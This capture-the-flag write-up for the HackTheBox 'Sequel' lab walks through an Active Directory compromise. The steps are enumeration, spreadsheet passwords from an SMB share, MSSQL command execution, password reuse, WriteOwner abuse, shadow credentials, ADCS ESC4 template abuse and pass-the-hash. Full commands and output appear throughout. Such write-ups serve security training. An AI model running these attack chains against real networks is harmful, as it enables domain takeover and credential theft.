Writeup of Sequel From HackTheBox
Published on: Friday, Dec 12, 2025
Getting a foothold
For the initial port scan, I use the following nmap command:
nmap -sS -A -Pn -T5 -p- -oN nmap.txt 10.129.229.189
And receive the following results:
# Nmap 7.95 scan initiated Sat Jan 11 20:17:32 2025 as: nmap -T5 -p- -A -sS -Pn -oN nmap.txt 10.10.11.51
mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers
Nmap scan report for 10.10.11.51
Host is up (0.10s latency).
Not shown: 65510 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-01-11 19:23:14Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.sequel.htb
| Not valid before: 2024-06-08T17:35:00
|_Not valid after: 2025-06-08T17:35:00
|_ssl-date: 2025-01-11T19:24:48+00:00; -59m57s from scanner time.
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.sequel.htb
| Not valid before: 2024-06-08T17:35:00
|_Not valid after: 2025-06-08T17:35:00
|_ssl-date: 2025-01-11T19:24:48+00:00; -59m57s from scanner time.
1433/tcp open ms-sql-s Microsoft SQL Server 2019 15.00.2000.00; RTM
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2025-01-11T19:03:10
|_Not valid after: 2055-01-11T19:03:10
|_ms-sql-ntlm-info: ERROR: Script execution failed (use -d to debug)
|_ms-sql-info: ERROR: Script execution failed (use -d to debug)
|_ssl-date: 2025-01-11T19:24:48+00:00; -59m57s from scanner time.
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.sequel.htb
| Not valid before: 2024-06-08T17:35:00
|_Not valid after: 2025-06-08T17:35:00
|_ssl-date: 2025-01-11T19:24:48+00:00; -59m57s from scanner time.
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49682/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49684/tcp open msrpc Microsoft Windows RPC
49685/tcp open msrpc Microsoft Windows RPC
49693/tcp open msrpc Microsoft Windows RPC
49712/tcp open msrpc Microsoft Windows RPC
49732/tcp open msrpc Microsoft Windows RPC
49787/tcp open msrpc Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2019|10 (97%)
OS CPE: cpe:/o:microsoft:windows_server_2019 cpe:/o:microsoft:windows_10
Aggressive OS guesses: Windows Server 2019 (97%), Microsoft Windows 10 1903 - 21H1 (91%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| smb2-time:
| date: 2025-01-11T19:24:11
|_ start_date: N/A
|_clock-skew: mean: -59m57s, deviation: 0s, median: -59m57s
TRACEROUTE (using port 445/tcp)
HOP RTT ADDRESS
1 98.43 ms 10.10.14.1
2 98.52 ms 10.10.11.51
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Jan 11 20:24:46 2025 -- 1 IP address (1 host up) scanned in 434.50 seconds
This box also provides us with credentials for a AD user rose:KxEPkKe6R8su. I use these credentials to start gathering information about the domain using bloodhound and certipy.
bloodhound-ce-python -ns 10.10.11.51 -u rose -p KxEPkKe6R8su -d sequel.htb -c All
certipy find -u rose@sequel.htb -p KxEPkKe6R8su -dc-ip 10.10.11.51 -vuln -old-bloodhound
Next I use NetExec to query the shares our user has access to.
[chris@attacker ~]$ nxc smb 10.10.11.51 -u rose -p KxEPkKe6R8su --shares
SMB 10.10.11.51 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:sequel.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.51 445 DC01 [+] sequel.htb\rose:KxEPkKe6R8su
SMB 10.10.11.51 445 DC01 [*] Enumerated shares
SMB 10.10.11.51 445 DC01 Share Permissions Remark
SMB 10.10.11.51 445 DC01 ----- ----------- ------
SMB 10.10.11.51 445 DC01 Accounting Department READ
SMB 10.10.11.51 445 DC01 ADMIN$ Remote Admin
SMB 10.10.11.51 445 DC01 C$ Default share
SMB 10.10.11.51 445 DC01 IPC$ READ Remote IPC
SMB 10.10.11.51 445 DC01 NETLOGON READ Logon server share
SMB 10.10.11.51 445 DC01 SYSVOL READ Logon server share
SMB 10.10.11.51 445 DC01 Users READ
The share Accounting Department looks interesting, so I use smbclient to look through the share.
smbclient -U 'sequel.htb\rose' '//10.10.11.51/Accounting Department'
Within the share I find two xlsx files, I download them and try to open them in LibreOffice, but they seem to be corrupted / incompatible. So I use unzip to extract the xlsx files and find usernames and passwords in the xl/sharedStrings.xml file of the accounts.xlsx file.
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="25" uniqueCount="24"><si><t xml:space="preserve">First Name</t></si><si><t xml:space="preserve">Last Name</t></si><si><t xml:space="preserve">Email</t></si><si><t xml:space="preserve">Username</t></si><si><t xml:space="preserve">Password</t></si>
<si><t xml:space="preserve">Angela</t></si><si><t xml:space="preserve">Martin</t></si><si><t xml:space="preserve">angela@sequel.htb</t></si><si><t xml:space="preserve">angela</t></si><si><t xml:space="preserve">0fwz7Q4mSpurIt99</t></si>
<si><t xml:space="preserve">Oscar</t></si><si><t xml:space="preserve">Martinez</t></si><si><t xml:space="preserve">oscar@sequel.htb</t></si><si><t xml:space="preserve">oscar</t></si><si><t xml:space="preserve">86LxLBMgEWaKUnBG</t></si>
<si><t xml:space="preserve">Kevin</t></si><si><t xml:space="preserve">Malone</t></si><si><t xml:space="preserve">kevin@sequel.htb</t></si><si><t xml:space="preserve">kevin</t></si><si><t xml:space="preserve">Md9Wlq1E5bZnVDVo</t></si>
<si><t xml:space="preserve">NULL</t></si><si><t xml:space="preserve">sa@sequel.htb</t></si><si><t xml:space="preserve">sa</t></si><si><t xml:space="preserve">MSSQLP@ssw0rd!</t></si></sst>
The credentials sa:MSSQLP@ssw0rd! look promising, so I try to connect to the mssql server using NetExec. The inital attempt fails but with the –local-auth flag I am able to connect.
[chris@attacker ~]$ nxc mssql 10.10.11.51 -u sa -p MSSQLP@ssw0rd! --local-auth
MSSQL 10.10.11.51 1433 DC01 [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:sequel.htb)
MSSQL 10.10.11.51 1433 DC01 [+] DC01\sa:MSSQLP@ssw0rd! (Pwn3d!)
The Pwn3d! message indicates that I am able to execute shell commands on the server via mssqlexec. I can use this to get a reverse shell on the server or just use the -x flag to send commands directly.
User flag
I use this to browse the filesystem and find a file called sql-Configuration.INI inside the _C:\SQL2019\ExpressAdv_ENU folder. Inside the file I find the password WqSZAF6CysDQbGb3 for the sql_svc account. Since I am unable to find any other interesting files, I use Bloodhound generate a list of domain users to check for password reuse.
nxc smb 10.10.11.51 -u ./users.txt -p WqSZAF6CysDQbGb3 --continue-on-success
The password WqSZAF6CysDQbGb3 is being reused by the user ryan. Checking ryan in bloodhound shows that he is part of the Remote Management Users group, which allows me to connect via evil-winrm and to thus get the user flag.
evil-winrm -i 10.10.11.51 -u 'sequel\ryan' -p WqSZAF6CysDQbGb3
Administrator flag
Another user that appeared interesting to me was ca_svc, using the pathfinding feature of bloodhound I can see that ryan can use his WriteOwner rights to take over the ca_svc account.
I use the following impacket commands to do so:
owneredit.py -action write -target ca_svc -new-owner ryan -dc-ip 10.10.11.51 'sequel.htb/ryan:WqSZAF6CysDQbGb3'
dacledit.py -action write -rights FullControl -principal ryan -target ca_svc -dc-ip 10.10.11.51 'sequel.htb/ryan:WqSZAF6CysDQbGb3'
If you get any errors related to md4 no longer being supported you can re-enable it by following this solution: https://github.com/openssl/openssl/issues/21247
Option 1: Setting a new password for ca_svc
net rpc password ca_svc "newP@ssw0rd2022" -U 'sequel.htb/ryan%WqSZAF6CysDQbGb3' -S "DC01.sequel.htb"
I can now use the new password to connect to the server ca_svc.
Option 2: Using shadow credentials to get the NT hash of ca_svc
Setting a new password for an existing account is not recommended in real life scenarios and shared environment. Another option is to use the shadow credentials option in Certipy to get the NT hash of the ca_svc account.
[chris@attacker ~]$ certipy shadow -account ca_svc -ns 10.10.11.51 -u ryan@sequel.htb -p WqSZAF6CysDQbGb3 auto -device-id 1
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Targeting user 'ca_svc'
[*] Generating certificate
[*] Certificate generated
[*] Generating Key Credential
[*] Key Credential generated with DeviceID '3998c1dd-d372-c372-c334-433237982de5'
[*] Adding Key Credential with device ID '3998c1dd-d372-c372-c334-433237982de5' to the Key Credentials for 'ca_svc'
[*] Successfully added Key Credential with device ID '3998c1dd-d372-c372-c334-433237982de5' to the Key Credentials for 'ca_svc'
[*] Authenticating as 'ca_svc' with the certificate
[*] Using principal: ca_svc@sequel.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'ca_svc.ccache'
[*] Trying to retrieve NT hash for 'ca_svc'
[*] Restoring the old Key Credentials for 'ca_svc'
[*] Successfully restored the old Key Credentials for 'ca_svc'
[*] NT hash for 'ca_svc': c318d62c8b3ca508dd753dda8cc74028
Using the credentials
The following commands can be executed with either the -p flag or the -hashes flag to use the password or the NT hash respectively.
I use the credentials to check for vulnerable certs using certipy:
[chris@attacker ~]$ certipy find -u ca_svc -hashes c318d62c8b3ca508dd753dda8cc74028 -dc-ip 10.10.11.51 -vuln -stdout
[*] Finding certificate templates
[*] Found 34 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 12 enabled certificate templates
[*] Trying to get CA configuration for 'sequel-DC01-CA' via CSRA
[!] Got error while trying to get CA configuration for 'sequel-DC01-CA' via CSRA: CASessionError: code: 0x80070005 - E_ACCESSDENIED - General access denied error.
[*] Trying to get CA configuration for 'sequel-DC01-CA' via RRP
[*] Got CA configuration for 'sequel-DC01-CA'
[*] Enumeration output:
Certificate Authorities
0
CA Name : sequel-DC01-CA
DNS Name : DC01.sequel.htb
Certificate Subject : CN=sequel-DC01-CA, DC=sequel, DC=htb
Certificate Serial Number : 152DBD2D8E9C079742C0F3BFF2A211D3
Certificate Validity Start : 2024-06-08 16:50:40+00:00
Certificate Validity End : 2124-06-08 17:00:40+00:00
Web Enrollment : Disabled
User Specified SAN : Disabled
Request Disposition : Issue
Enforce Encryption for Requests : Enabled
Permissions
Owner : SEQUEL.HTB\Administrators
Access Rights
ManageCertificates : SEQUEL.HTB\Administrators
SEQUEL.HTB\Domain Admins
SEQUEL.HTB\Enterprise Admins
ManageCa : SEQUEL.HTB\Administrators
SEQUEL.HTB\Domain Admins
SEQUEL.HTB\Enterprise Admins
Enroll : SEQUEL.HTB\Authenticated Users
Certificate Templates
0
Template Name : DunderMifflinAuthentication
Display Name : Dunder Mifflin Authentication
Certificate Authorities : sequel-DC01-CA
Enabled : True
Client Authentication : True
Enrollment Agent : False
Any Purpose : False
Enrollee Supplies Subject : False
Certificate Name Flag : SubjectRequireCommonName
SubjectAltRequireDns
Enrollment Flag : AutoEnrollment
PublishToDs
Private Key Flag : 16842752
Extended Key Usage : Client Authentication
Server Authentication
Requires Manager Approval : False
Requires Key Archival : False
Authorized Signatures Required : 0
Validity Period : 1000 years
Renewal Period : 6 weeks
Minimum RSA Key Length : 2048
Permissions
Enrollment Permissions
Enrollment Rights : SEQUEL.HTB\Domain Admins
SEQUEL.HTB\Enterprise Admins
Object Control Permissions
Owner : SEQUEL.HTB\Enterprise Admins
Full Control Principals : SEQUEL.HTB\Cert Publishers
Write Owner Principals : SEQUEL.HTB\Domain Admins
SEQUEL.HTB\Enterprise Admins
SEQUEL.HTB\Administrator
SEQUEL.HTB\Cert Publishers
Write Dacl Principals : SEQUEL.HTB\Domain Admins
SEQUEL.HTB\Enterprise Admins
SEQUEL.HTB\Administrator
SEQUEL.HTB\Cert Publishers
Write Property Principals : SEQUEL.HTB\Domain Admins
SEQUEL.HTB\Enterprise Admins
SEQUEL.HTB\Administrator
SEQUEL.HTB\Cert Publishers
[!] Vulnerabilities
ESC4 : 'SEQUEL.HTB\\Cert Publishers' has dangerous permissions
The result shows that the certificate template DunderMifflinAuthentication is vulnerable to ESC4 and that the Cert Publishers group is able to modify the template. I use certipy to exploit this.
certipy template -u ca_svc -hashes c318d62c8b3ca508dd753dda8cc74028 -dc-ip 10.10.11.51 -template DunderMifflinAuthentication -target dc01.sequel.htb -save-old
certipy req -ca sequel-DC01-CA -template DunderMifflinAuthentication -dc-ip 10.10.11.51 -u ca_svc -hashes c318d62c8b3ca508dd753dda8cc74028 -target dc01.sequel.htb -upn administrator@sequel.htb
certipy auth -pfx administrator.pfx -dc-ip 10.10.11.51
This gives us the NTLM hash of the administrator account, which we can use to connect via evil-winrm and to get the root flag.
evil-winrm -i 10.10.11.51 -u 'sequel\administrator' -H 7a8d4e04986afa8ed4060f75e5a0b3ff